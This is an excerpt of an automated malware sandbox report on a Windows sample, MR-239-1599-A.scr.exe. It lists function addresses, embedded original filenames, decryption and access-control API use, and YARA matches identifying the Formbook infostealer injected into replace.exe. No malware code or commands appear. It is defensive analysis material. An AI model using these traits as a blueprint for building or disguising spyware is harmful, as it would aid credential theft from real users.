                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FEA803_2_014FEA80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159CD1F3_2_0159CD1F
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150AD003_2_0150AD00
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FADE03_2_014FADE0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01518DBF3_2_01518DBF
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500C003_2_01500C00
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F0CF23_2_014F0CF2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A0CB53_2_015A0CB5
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01574F403_2_01574F40
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01520F303_2_01520F30
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A2F303_2_015A2F30
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01542F283_2_01542F28
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F2FC83_2_014F2FC8
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157EFA03_2_0157EFA0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500E593_2_01500E59
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BEE263_2_015BEE26
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BEEDB3_2_015BEEDB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01512E903_2_01512E90
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BCE933_2_015BCE93
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015CB16B3_2_015CB16B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014EF1723_2_014EF172
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153516C3_2_0153516C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150B1B03_2_0150B1B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015070C03_2_015070C0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015AF0CC3_2_015AF0CC
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B70E93_2_015B70E9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BF0E03_2_015BF0E0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014ED34C3_2_014ED34C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B132D3_2_015B132D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0154739A3_2_0154739A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151B2C03_2_0151B2C0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151D2F03_2_0151D2F0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A12ED3_2_015A12ED
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015052A03_2_015052A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B75713_2_015B7571
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159D5B03_2_0159D5B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F14603_2_014F1460
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BF43F3_2_015BF43F
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BF7B03_2_015BF7B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015456303_2_01545630
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B16CC3_2_015B16CC
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015099503_2_01509950
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151B9503_2_0151B950
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015959103_2_01595910
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156D8003_2_0156D800
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015038E03_2_015038E0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BFB763_2_015BFB76
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01575BF03_2_01575BF0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153DBF93_2_0153DBF9
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151FB803_2_0151FB80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BFA493_2_015BFA49
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B7A463_2_015B7A46
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01573A6C3_2_01573A6C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015ADAC63_2_015ADAC6
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01545AA03_2_01545AA0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159DAAC3_2_0159DAAC
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A1AA33_2_015A1AA3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B1D5A3_2_015B1D5A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01503D403_2_01503D40
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B7D733_2_015B7D73
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151FDC03_2_0151FDC0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01579C323_2_01579C32
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BFCF23_2_015BFCF2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BFF093_2_015BFF09
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014C3FD53_2_014C3FD5
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014C3FD23_2_014C3FD2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01501F923_2_01501F92
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015BFFB13_2_015BFFB1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01509EB03_2_01509EB0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DA3526_2_034DA352
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034E03E66_2_034E03E6
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0342E3F06_2_0342E3F0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C02746_2_034C0274
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034A02C06_2_034A02C0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034A81586_2_034A8158
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034101006_2_03410100
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034BA1186_2_034BA118
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D81CC6_2_034D81CC
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034E01AA6_2_034E01AA
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D41A26_2_034D41A2
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034B20006_2_034B2000
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034447506_2_03444750
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034207706_2_03420770
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0341C7C06_2_0341C7C0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343C6E06_2_0343C6E0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034205356_2_03420535
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034E05916_2_034E0591
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D24466_2_034D2446
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C44206_2_034C4420
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034CE4F66_2_034CE4F6
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DAB406_2_034DAB40
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D6BD76_2_034D6BD7
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0341EA806_2_0341EA80
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034369626_2_03436962
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034229A06_2_034229A0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034EA9A66_2_034EA9A6
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034228406_2_03422840
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0342A8406_2_0342A840
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0344E8F06_2_0344E8F0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034068B86_2_034068B8
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03494F406_2_03494F40
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03462F286_2_03462F28
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03440F306_2_03440F30
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C2F306_2_034C2F30
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03412FC86_2_03412FC8
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0349EFA06_2_0349EFA0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03420E596_2_03420E59
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DEE266_2_034DEE26
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DEEDB6_2_034DEEDB
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03432E906_2_03432E90
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DCE936_2_034DCE93
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0342AD006_2_0342AD00
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034BCD1F6_2_034BCD1F
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0341ADE06_2_0341ADE0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03438DBF6_2_03438DBF
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03420C006_2_03420C00
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03410CF26_2_03410CF2
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C0CB56_2_034C0CB5
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0340D34C6_2_0340D34C
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D132D6_2_034D132D
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0346739A6_2_0346739A
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343B2C06_2_0343B2C0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C12ED6_2_034C12ED
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343D2F06_2_0343D2F0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034252A06_2_034252A0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034EB16B6_2_034EB16B
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0345516C6_2_0345516C
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0340F1726_2_0340F172
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0342B1B06_2_0342B1B0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034CF0CC6_2_034CF0CC
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034270C06_2_034270C0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D70E96_2_034D70E9
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DF0E06_2_034DF0E0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DF7B06_2_034DF7B0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034656306_2_03465630
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D16CC6_2_034D16CC
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D75716_2_034D7571
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034E95C36_2_034E95C3
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034BD5B06_2_034BD5B0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034114606_2_03411460
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DF43F6_2_034DF43F
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DFB766_2_034DFB76
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03495BF06_2_03495BF0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0345DBF96_2_0345DBF9
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343FB806_2_0343FB80
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DFA496_2_034DFA49
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D7A466_2_034D7A46
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03493A6C6_2_03493A6C
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034CDAC66_2_034CDAC6
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03465AA06_2_03465AA0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034BDAAC6_2_034BDAAC
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034C1AA36_2_034C1AA3
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034299506_2_03429950
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343B9506_2_0343B950
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034B59106_2_034B5910
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0348D8006_2_0348D800
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034238E06_2_034238E0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DFF096_2_034DFF09
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03421F926_2_03421F92
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_033E3FD56_2_033E3FD5
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_033E3FD26_2_033E3FD2
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DFFB16_2_034DFFB1
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03429EB06_2_03429EB0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03423D406_2_03423D40
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D1D5A6_2_034D1D5A
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034D7D736_2_034D7D73
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_0343FDC06_2_0343FDC0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_03499C326_2_03499C32
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_034DFCF26_2_034DFCF2
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C116D06_2_02C116D0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C2A1E06_2_02C2A1E0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C0CAB06_2_02C0CAB0
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C0AB306_2_02C0AB30
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C0C8876_2_02C0C887
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C0C8906_2_02C0C890
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C1322B6_2_02C1322B
                  Source: C:\Windows\SysWOW64\replace.exeCode function: 6_2_02C132306_2_02C13230
                  Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0348EA12 appears 86 times
                  Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0340B970 appears 262 times
                  Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 03455130 appears 58 times
                  Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0349F290 appears 103 times
                  Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 03467E54 appears 107 times
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: String function: 0157F290 appears 103 times
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: String function: 014EB970 appears 262 times
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: String function: 01535130 appears 58 times
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: String function: 0156EA12 appears 86 times
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: String function: 01547E54 appears 101 times
                  Source: MR-239-1599-A.scr.exeStatic PE information: invalid certificate
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1652259895.0000000003D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1655127195.0000000007A10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1651899586.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1651258353.0000000000F3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000000.00000002.1654654834.00000000074B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.000000000107A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000003.00000002.1946410833.00000000015ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.0000000001067000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exeBinary or memory string: OriginalFilenamePIqH.exe& vs MR-239-1599-A.scr.exe
                  Source: MR-239-1599-A.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: MR-239-1599-A.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.MR-239-1599-A.scr.exe.74b0000.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.MR-239-1599-A.scr.exe.74b0000.4.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.MR-239-1599-A.scr.exe.74b0000.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.MR-239-1599-A.scr.exe.3d49970.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.MR-239-1599-A.scr.exe.3d49970.1.raw.unpack, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.MR-239-1599-A.scr.exe.3d49970.1.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, FF8AN7cloefg4PRKmr.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, FF8AN7cloefg4PRKmr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, FF8AN7cloefg4PRKmr.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, FF8AN7cloefg4PRKmr.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, FF8AN7cloefg4PRKmr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, FF8AN7cloefg4PRKmr.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.MR-239-1599-A.scr.exe.40cc618.3.raw.unpack, gfiBMJyWKejJe42fYy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, FF8AN7cloefg4PRKmr.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, FF8AN7cloefg4PRKmr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, FF8AN7cloefg4PRKmr.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.MR-239-1599-A.scr.exe.7a10000.7.raw.unpack, gfiBMJyWKejJe42fYy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.MR-239-1599-A.scr.exe.4150238.2.raw.unpack, gfiBMJyWKejJe42fYy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@19/10
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MR-239-1599-A.scr.exe.logJump to behavior
